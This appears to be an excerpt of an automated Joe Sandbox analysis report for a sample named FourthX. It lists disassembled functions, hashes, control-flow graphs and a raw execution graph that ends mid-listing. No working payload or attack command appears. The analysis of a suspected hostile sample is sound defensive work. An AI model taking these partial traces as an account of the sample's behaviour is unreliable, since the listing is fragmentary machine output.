                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                            • API String ID: 2595394609-2123141913
                                                                                            • Opcode ID: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
                                                                                            • Instruction ID: 936dc1ac31dd1d72ccd6f728fe2a8f0f2c96fe4a33b2c6f95d740c1509243585
                                                                                            • Opcode Fuzzy Hash: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
                                                                                            • Instruction Fuzzy Hash: 0B416B61B09A46D5EE318B21E8446B837E0FB86BD4F5445F2DA8DC77A5DE3CE585C300
                                                                                            Function 00007FF69A532104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                            • String ID:
                                                                                            • API String ID: 3326252324-0
                                                                                            • Opcode ID: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
                                                                                            • Instruction ID: e937c9c1ed9718ddbcafcab35454499aa16924c2c1bd6441c7b460cd0cae7ae3
                                                                                            • Opcode Fuzzy Hash: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
                                                                                            • Instruction Fuzzy Hash: 88211D64F0AA02D1FAB58F01E95037832E0FF92B91F4441F0D99DCB6A4DF2CA856C300
                                                                                            Function 00007FF69A531E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 592 7ff69a531e10-7ff69a531e2d 593 7ff69a531e3e-7ff69a531e48 592->593 594 7ff69a531e2f-7ff69a531e38 592->594 596 7ff69a531e4a-7ff69a531e53 593->596 597 7ff69a531ea3-7ff69a531ea8 593->597 594->593 595 7ff69a531f60-7ff69a531f69 594->595 598 7ff69a531ecc-7ff69a531ed1 596->598 599 7ff69a531e55-7ff69a531e60 596->599 597->595 600 7ff69a531eae-7ff69a531eb3 597->600 603 7ff69a531f23-7ff69a531f2d 598->603 604 7ff69a531ed3-7ff69a531ee2 signal 598->604 599->597 601 7ff69a531efb-7ff69a531f0a call 7ff69a537d00 600->601 602 7ff69a531eb5-7ff69a531eba 600->602 601->603 614 7ff69a531f0c-7ff69a531f10 601->614 602->595 607 7ff69a531ec0 602->607 605 7ff69a531f2f-7ff69a531f3f 603->605 606 7ff69a531f43-7ff69a531f45 603->606 604->603 608 7ff69a531ee4-7ff69a531ee8 604->608 613 7ff69a531f5a 605->613 606->595 607->603 610 7ff69a531eea-7ff69a531ef9 signal 608->610 611 7ff69a531f4e-7ff69a531f53 608->611 610->595 611->613 613->595 615 7ff69a531f55 614->615 616 7ff69a531f12-7ff69a531f21 signal 614->616 615->613 616->595 616->603
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CCG
                                                                                            • API String ID: 0-1584390748
                                                                                            • Opcode ID: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
                                                                                            • Instruction ID: 68dc0b8fc1a103ebec670638cf0e0f9a378b6514b6380d9caa9f96fb0f24444e
                                                                                            • Opcode Fuzzy Hash: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
                                                                                            • Instruction Fuzzy Hash: 33213925F09106C2FE79562495903BD35C1EFCA7A4F2586F5DA9DC72D8DF2CA882C250
                                                                                            Function 00007FF69A531880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 617 7ff69a531880-7ff69a53189c 618 7ff69a531a0f-7ff69a531a1f 617->618 619 7ff69a5318a2-7ff69a5318f9 call 7ff69a532420 call 7ff69a532660 617->619 619->618 624 7ff69a5318ff-7ff69a531910 619->624 625 7ff69a53193e-7ff69a531941 624->625 626 7ff69a531912-7ff69a53191c 624->626 627 7ff69a53194d-7ff69a531954 625->627 629 7ff69a531943-7ff69a531947 625->629 626->627 628 7ff69a53191e-7ff69a531929 626->628 632 7ff69a531956-7ff69a531961 627->632 633 7ff69a53199e-7ff69a5319a6 627->633 628->627 630 7ff69a53192b-7ff69a53193a 628->630 629->627 631 7ff69a531a20-7ff69a531a26 629->631 630->625 636 7ff69a531b87-7ff69a531b98 call 7ff69a531d40 631->636 637 7ff69a531a2c-7ff69a531a37 631->637 634 7ff69a531970-7ff69a53199c call 7ff69a531ba0 632->634 633->618 635 7ff69a5319a8-7ff69a5319c1 633->635 634->633 639 7ff69a5319df-7ff69a5319e7 635->639 637->633 641 7ff69a531a3d-7ff69a531a5f 637->641 643 7ff69a5319e9-7ff69a531a0d VirtualProtect 639->643 644 7ff69a5319d0-7ff69a5319dd 639->644 646 7ff69a531a7d-7ff69a531a97 641->646 643->644 644->618 644->639 647 7ff69a531a9d-7ff69a531afa 646->647 648 7ff69a531b74-7ff69a531b82 call 7ff69a531d40 646->648 653 7ff69a531afc-7ff69a531b0e 647->653 654 7ff69a531b22-7ff69a531b26 647->654 648->636 655 7ff69a531b5c-7ff69a531b6f call 7ff69a531d40 653->655 656 7ff69a531b10-7ff69a531b20 653->656 657 7ff69a531b2c-7ff69a531b30 654->657 658 7ff69a531a70-7ff69a531a77 654->658 655->648 656->654 656->655 657->658 659 7ff69a531b36-7ff69a531b53 call 7ff69a531ba0 657->659 658->633 658->646 659->655
                                                                                            APIs
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69A531247), ref: 00007FF69A5319F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                            • API String ID: 544645111-395989641
                                                                                            • Opcode ID: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
                                                                                            • Instruction ID: aca4f6efb5fb722d6bb26be9bce3f117772422d5fa2dc261b4998a717cbcc4ab
                                                                                            • Opcode Fuzzy Hash: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
                                                                                            • Instruction Fuzzy Hash: 52518CA6F08546D6EB248B21E8417B837E1FB96BA5F4441F1D99DC7798CE3CE482C700
                                                                                            Function 00007FF69A531800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 663 7ff69a531800-7ff69a531810 664 7ff69a531824 663->664 665 7ff69a531812-7ff69a531822 663->665 666 7ff69a53182b-7ff69a531867 call 7ff69a532290 fprintf 664->666 665->666
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: fprintf
                                                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                            • API String ID: 383729395-3474627141
                                                                                            • Opcode ID: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
                                                                                            • Instruction ID: bece9b8ca8804c2d7c8925431e878fa94c323fb41193b8c37aa6644d0e4deb20
                                                                                            • Opcode Fuzzy Hash: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
                                                                                            • Instruction Fuzzy Hash: BAF06211F18A45C2E6719B64A9410BDB3A0FB9A7C1F5092B1EF8ED7655DF2CF182C300
                                                                                            Function 00007FF69A53219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 682475483-0
                                                                                            • Opcode ID: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
                                                                                            • Instruction ID: 38821839cf20a7fd568428543fc41f356ba00b882f7b8f6504be8e72e265c3aa
                                                                                            • Opcode Fuzzy Hash: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
                                                                                            • Instruction Fuzzy Hash: A2012C65B0EA02C2F6B58F01EE5427832E0FF96BD1F4441F1CA9DD76A4DF2CA895C200

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.7%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:1710
                                                                                            Total number of Limit Nodes:2
                                                                                            execution_graph 4483 7ff7ee4a1a70 4485 7ff7ee4a199e 4483->4485 4487 7ff7ee4a1a7d 4483->4487 4484 7ff7ee4a1a0f 4485->4484 4486 7ff7ee4a19e9 VirtualProtect 4485->4486 4486->4485 4487->4483 4488 7ff7ee4a1b36 4487->4488 4490 7ff7ee4a1b53 4487->4490 4489 7ff7ee4a1ba0 4 API calls 4488->4489 4489->4490 4507 7ff7ee4a1e10 4508 7ff7ee4a1e2f 4507->4508 4509 7ff7ee4a1e55 4508->4509 4510 7ff7ee4a1ecc 4508->4510 4511 7ff7ee4a1eb5 4508->4511 4509->4511 4515 7ff7ee4a1f12 signal 4509->4515 4510->4511 4512 7ff7ee4a1ed3 signal 4510->4512 4512->4511 4513 7ff7ee4a1ee4 4512->4513 4513->4511 4514 7ff7ee4a1eea signal 4513->4514 4514->4511 4515->4511 4552 7ff7ee4a2050 4553 7ff7ee4a20cf 4552->4553 4554 7ff7ee4a205e EnterCriticalSection 4552->4554 4555 7ff7ee4a20c2 LeaveCriticalSection 4554->4555 4556 7ff7ee4a2079 4554->4556 4555->4553 4556->4555 4557 7ff7ee4a20bd free 4556->4557 4557->4555 4558 7ff7ee4a1fd0 4559 7ff7ee4a1fe4 4558->4559 4560 7ff7ee4a2033 4558->4560 4559->4560 4561 7ff7ee4a1ffd EnterCriticalSection LeaveCriticalSection 4559->4561 4561->4560 4491 7ff7ee4a216f 4492 7ff7ee4a2185 4491->4492 4493 7ff7ee4a2178 InitializeCriticalSection 4491->4493 4493->4492 4479 7ff7ee4a1394 4480 7ff7ee4a7760 malloc 4479->4480 4481 7ff7ee4a13b8 4480->4481 4482 7ff7ee4a13c6 NtSetDefaultUILanguage 4481->4482 4536 7ff7ee4a1ab3 4538 7ff7ee4a1a70 4536->4538 4537 7ff7ee4a199e 4541 7ff7ee4a1a0f 4537->4541 4543 7ff7ee4a19e9 VirtualProtect 4537->4543 4538->4536 4538->4537 4539 7ff7ee4a1b36 4538->4539 4542 7ff7ee4a1b53 4538->4542 4540 7ff7ee4a1ba0 4 API calls 4539->4540 4540->4542 4543->4537 4570 7ff7ee4a1f47 4571 7ff7ee4a1e67 signal 4570->4571 4572 7ff7ee4a1e99 4570->4572 4571->4572 4573 7ff7ee4a1e7c 4571->4573 4573->4572 4574 7ff7ee4a1e82 signal 4573->4574 4574->4572 2794 7ff7ee4a1140 2797 7ff7ee4a1160 2794->2797 2796 7ff7ee4a1156 2798 7ff7ee4a11b9 2797->2798 2799 7ff7ee4a118b 2797->2799 2801 7ff7ee4a11d3 2798->2801 2802 7ff7ee4a11c7 _amsg_exit 2798->2802 2799->2798 2800 7ff7ee4a1190 2799->2800 2800->2798 2803 7ff7ee4a11a0 Sleep 2800->2803 2804 7ff7ee4a1201 _initterm 2801->2804 2805 7ff7ee4a121a 2801->2805 2802->2801 2803->2798 2803->2800 2804->2805 2822 7ff7ee4a1880 2805->2822 2808 7ff7ee4a126a 2809 7ff7ee4a126f malloc 2808->2809 2810 7ff7ee4a128b 2809->2810 2813 7ff7ee4a12d2 2809->2813 2811 7ff7ee4a12a0 strlen malloc memcpy 2810->2811 2811->2811 2812 7ff7ee4a12d0 2811->2812 2812->2813 2835 7ff7ee4a3b50 2813->2835 2815 7ff7ee4a1315 2816 7ff7ee4a1344 2815->2816 2817 7ff7ee4a1324 2815->2817 2820 7ff7ee4a1160 91 API calls 2816->2820 2818 7ff7ee4a1338 2817->2818 2819 7ff7ee4a132d _cexit 2817->2819 2818->2796 2819->2818 2821 7ff7ee4a1366 2820->2821 2821->2796 2823 7ff7ee4a1247 SetUnhandledExceptionFilter 2822->2823 2824 7ff7ee4a18a2 2822->2824 2823->2808 2824->2823 2825 7ff7ee4a194d 2824->2825 2830 7ff7ee4a1a20 2824->2830 2826 7ff7ee4a1956 2825->2826 2827 7ff7ee4a199e 2825->2827 2826->2827 3002 7ff7ee4a1ba0 2826->3002 2827->2823 2829 7ff7ee4a19e9 VirtualProtect 2827->2829 2829->2827 2830->2827 2831 7ff7ee4a1b5c 2830->2831 2832 7ff7ee4a1b36 2830->2832 2833 7ff7ee4a1ba0 4 API calls 2832->2833 2834 7ff7ee4a1b53 2833->2834 2834->2831 2838 7ff7ee4a3b66 2835->2838 2836 7ff7ee4a3c60 wcslen 3012 7ff7ee4a153f 2836->3012 2838->2836 2840 7ff7ee4a420b 2840->2815 2843 7ff7ee4a3d60 2846 7ff7ee4a3d7a memset wcscat memset 2843->2846 2848 7ff7ee4a3dd3 2846->2848 2849 7ff7ee4a3e23 wcslen 2848->2849 2850 7ff7ee4a3e35 2849->2850 2854 7ff7ee4a3e7c 2849->2854 2851 7ff7ee4a3e50 _wcsnicmp 2850->2851 2852 7ff7ee4a3e66 wcslen 2851->2852 2851->2854 2852->2851 2852->2854 2853 7ff7ee4a3edd wcscpy wcscat memset 2856 7ff7ee4a3f1c 2853->2856 2854->2853 2855 7ff7ee4a4024 wcscpy wcscat 2857 7ff7ee4a404f memset 2855->2857 2862 7ff7ee4a4131 2855->2862 2856->2855 2858 7ff7ee4a4070 2857->2858 2859 7ff7ee4a40d3 wcslen 2858->2859 2861 7ff7ee4a40e9 2859->2861 2868 7ff7ee4a412c 2859->2868 2863 7ff7ee4a4100 _wcsnicmp 2861->2863 3200 7ff7ee4a2df0 2862->3200 2864 7ff7ee4a4116 wcslen 2863->2864 2863->2868 2864->2863 2864->2868 2865 7ff7ee4a4376 wcscpy wcscat _wcsicmp 2866 7ff7ee4a43c3 memset 2865->2866 2867 7ff7ee4a43aa 2865->2867 2871 7ff7ee4a43e4 2866->2871 3212 7ff7ee4a14d6 2867->3212 2868->2865 2870 7ff7ee4a4429 wcscpy wcscat memset 2873 7ff7ee4a446f 2870->2873 2871->2870 2872 7ff7ee4a44d2 wcscpy wcscat memset 2874 7ff7ee4a4518 2872->2874 2873->2872 2875 7ff7ee4a4548 wcscpy wcscat 2874->2875 2876 7ff7ee4a61f8 memcpy 2875->2876 2877 7ff7ee4a457a 2875->2877 2876->2877 2878 7ff7ee4a2df0 11 API calls 2877->2878 2880 7ff7ee4a472d 2878->2880 2879 7ff7ee4a2df0 11 API calls 2881 7ff7ee4a4845 memset 2879->2881 2880->2879 2882 7ff7ee4a4866 2881->2882 2883 7ff7ee4a48a9 wcscpy wcscat memset 2882->2883 2884 7ff7ee4a48f2 2883->2884 2885 7ff7ee4a4935 wcscpy wcscat wcslen 2884->2885 3269 7ff7ee4a146d 2885->3269 2888 7ff7ee4a4a46 2891 7ff7ee4a4b40 wcslen 2888->2891 2897 7ff7ee4a4d10 2888->2897 3445 7ff7ee4a157b 2891->3445 2892 7ff7ee4a145e 2 API calls 2892->2888 2896 7ff7ee4a4e51 wcslen 2900 7ff7ee4a157b 2 API calls 2896->2900 2897->2896 2898 7ff7ee4a4ca3 wcslen 3483 7ff7ee4a15e4 2898->3483 2902 7ff7ee4a4edb 2900->2902 2905 7ff7ee4a4ee3 memset 2902->2905 2909 7ff7ee4a4ff5 2902->2909 2903 7ff7ee4a145e 2 API calls 2903->2897 2904 7ff7ee4a4bff 2904->2897 2904->2898 2907 7ff7ee4a4f04 2905->2907 2906 7ff7ee4a4f54 wcslen 3486 7ff7ee4a15a8 2906->3486 2907->2906 2908 7ff7ee4a2df0 11 API calls 2915 7ff7ee4a50a0 2908->2915 2909->2908 2918 7ff7ee4a5194 _wcsicmp 2909->2918 2912 7ff7ee4a4fc4 _wcsnicmp 2913 7ff7ee4a4fe9 2912->2913 2919 7ff7ee4a5821 2912->2919 2914 7ff7ee4a145e 2 API calls 2913->2914 2914->2909 2916 7ff7ee4a2df0 11 API calls 2915->2916 2916->2918 2917 7ff7ee4a587e wcslen 2921 7ff7ee4a15a8 2 API calls 2917->2921 2920 7ff7ee4a51af memset 2918->2920 2933 7ff7ee4a5532 2918->2933 2919->2917 2924 7ff7ee4a51d3 2920->2924 2922 7ff7ee4a58da 2921->2922 2925 7ff7ee4a145e 2 API calls 2922->2925 2923 7ff7ee4a5218 wcscpy wcscat wcslen 2927 7ff7ee4a146d 2 API calls 2923->2927 2924->2923 2925->2909 2926 7ff7ee4a5639 wcslen 2928 7ff7ee4a153f 2 API calls 2926->2928 2929 7ff7ee4a52e5 2927->2929 2930 7ff7ee4a56c4 2928->2930 3497 7ff7ee4a1530 2929->3497 2932 7ff7ee4a145e 2 API calls 2930->2932 2935 7ff7ee4a56d6 2932->2935 2933->2926 2945 7ff7ee4a576e 2935->2945 3761 7ff7ee4a2f70 2935->3761 2936 7ff7ee4a68b3 2939 7ff7ee4a145e 2 API calls 2936->2939 2937 7ff7ee4a5323 3536 7ff7ee4a14a9 2937->3536 2942 7ff7ee4a68bf 2939->2942 2940 7ff7ee4a57cb wcslen 2944 7ff7ee4a57e1 2940->2944 2962 7ff7ee4a581c 2940->2962 2942->2815 2949 7ff7ee4a57f0 _wcsnicmp 2944->2949 2945->2940 2946 7ff7ee4a53bf 2948 7ff7ee4a145e 2 API calls 2946->2948 2947 7ff7ee4a5704 3765 7ff7ee4a38e0 2947->3765 2952 7ff7ee4a53b3 2948->2952 2953 7ff7ee4a5806 wcslen 2949->2953 2949->2962 3686 7ff7ee4a3350 memset 2952->3686 2953->2949 2953->2962 2956 7ff7ee4a5987 memset wcscpy wcscat 2961 7ff7ee4a2f70 2 API calls 2956->2961 2957 7ff7ee4a53a7 2963 7ff7ee4a145e 2 API calls 2957->2963 2958 7ff7ee4a14c7 2 API calls 2959 7ff7ee4a5760 2958->2959 2959->2945 2966 7ff7ee4a145e 2 API calls 2959->2966 2965 7ff7ee4a59de 2961->2965 2962->2956 2963->2952 2968 7ff7ee4a3350 11 API calls 2965->2968 2966->2945 2969 7ff7ee4a59f6 2968->2969 2970 7ff7ee4a14c7 2 API calls 2969->2970 2971 7ff7ee4a5a24 memset 2970->2971 2974 7ff7ee4a5a45 2971->2974 2972 7ff7ee4a540e 2973 7ff7ee4a2df0 11 API calls 2972->2973 2981 7ff7ee4a5497 2973->2981 2975 7ff7ee4a5a95 wcslen 2974->2975 2976 7ff7ee4a5aa7 2975->2976 2977 7ff7ee4a5ae7 wcscat memset 2975->2977 2978 7ff7ee4a5ac0 _wcsnicmp 2976->2978 2983 7ff7ee4a5b22 2977->2983 2978->2977 2980 7ff7ee4a5ad2 wcslen 2978->2980 2980->2977 2980->2978 2982 7ff7ee4a2df0 11 API calls 2981->2982 2982->2840 2984 7ff7ee4a5b92 wcscpy wcscat 2983->2984 2986 7ff7ee4a5bc4 2984->2986 2985 7ff7ee4a6827 memcpy 2987 7ff7ee4a5d01 2985->2987 2986->2985 2986->2987 2988 7ff7ee4a5dbf wcslen 2987->2988 2989 7ff7ee4a153f 2 API calls 2988->2989 2990 7ff7ee4a5e4a 2989->2990 2991 7ff7ee4a145e 2 API calls 2990->2991 2992 7ff7ee4a5e5b 2991->2992 2993 7ff7ee4a5efa 2992->2993 2995 7ff7ee4a2f70 2 API calls 2992->2995 2994 7ff7ee4a145e 2 API calls 2993->2994 2994->2840 2996 7ff7ee4a5e88 2995->2996 2997 7ff7ee4a38e0 11 API calls 2996->2997 2998 7ff7ee4a5eb4 2997->2998 2999 7ff7ee4a14c7 2 API calls 2998->2999 3000 7ff7ee4a5eec 2999->3000 3000->2993 3001 7ff7ee4a145e 2 API calls 3000->3001 3001->2993 3004 7ff7ee4a1bc2 3002->3004 3003 7ff7ee4a1c04 memcpy 3003->2826 3004->3003 3006 7ff7ee4a1c45 VirtualQuery 3004->3006 3007 7ff7ee4a1cf4 3004->3007 3006->3007 3011 7ff7ee4a1c72 3006->3011 3008 7ff7ee4a1d23 GetLastError 3007->3008 3009 7ff7ee4a1d37 3008->3009 3010 7ff7ee4a1ca4 VirtualProtect 3010->3003 3010->3008 3011->3003 3011->3010 3788 7ff7ee4a1394 3012->3788 3014 7ff7ee4a154e 3015 7ff7ee4a1394 2 API calls 3014->3015 3016 7ff7ee4a1558 3015->3016 3017 7ff7ee4a155d 3016->3017 3018 7ff7ee4a1394 2 API calls 3016->3018 3019 7ff7ee4a1394 2 API calls 3017->3019 3018->3017 3020 7ff7ee4a1567 3019->3020 3021 7ff7ee4a156c 3020->3021 3022 7ff7ee4a1394 2 API calls 3020->3022 3023 7ff7ee4a1394 2 API calls 3021->3023 3022->3021 3024 7ff7ee4a1576 3023->3024 3025 7ff7ee4a157b 3024->3025 3026 7ff7ee4a1394 2 API calls 3024->3026 3027 7ff7ee4a1394 2 API calls 3025->3027 3026->3025 3028 7ff7ee4a1585 3027->3028 3029 7ff7ee4a158a 3028->3029 3030 7ff7ee4a1394 2 API calls 3028->3030 3031 7ff7ee4a1394 2 API calls 3029->3031 3030->3029 3032 7ff7ee4a1599 3031->3032 3033 7ff7ee4a1394 2 API calls 3032->3033 3034 7ff7ee4a15a3 3033->3034 3035 7ff7ee4a1394 2 API calls 3034->3035 3036 7ff7ee4a15a8 3035->3036 3037 7ff7ee4a1394 2 API calls 3036->3037 3038 7ff7ee4a15b7 3037->3038 3039 7ff7ee4a1394 2 API calls 3038->3039 3040 7ff7ee4a15c6 3039->3040 3041 7ff7ee4a1394 2 API calls 3040->3041 3042 7ff7ee4a15d5 3041->3042 3043 7ff7ee4a15e4 3042->3043 3044 7ff7ee4a1394 2 API calls 3042->3044 3045 7ff7ee4a1394 2 API calls 3043->3045 3044->3043 3046 7ff7ee4a15f3 3045->3046 3046->2840 3047 7ff7ee4a1503 3046->3047 3048 7ff7ee4a1512 3047->3048 3049 7ff7ee4a1394 2 API calls 3047->3049 3050 7ff7ee4a1394 2 API calls 3048->3050 3049->3048 3051 7ff7ee4a1521 3050->3051 3052 7ff7ee4a1394 2 API calls 3051->3052 3053 7ff7ee4a152b 3052->3053 3054 7ff7ee4a1530 3053->3054 3055 7ff7ee4a1394 2 API calls 3053->3055 3056 7ff7ee4a1394 2 API calls 3054->3056 3055->3054 3057 7ff7ee4a153a 3056->3057 3058 7ff7ee4a153f 3057->3058 3059 7ff7ee4a1394 2 API calls 3057->3059 3060 7ff7ee4a1394 2 API calls 3058->3060 3059->3058 3061 7ff7ee4a154e 3060->3061 3062 7ff7ee4a1394 2 API calls 3061->3062 3063 7ff7ee4a1558 3062->3063 3064 7ff7ee4a155d 3063->3064 3065 7ff7ee4a1394 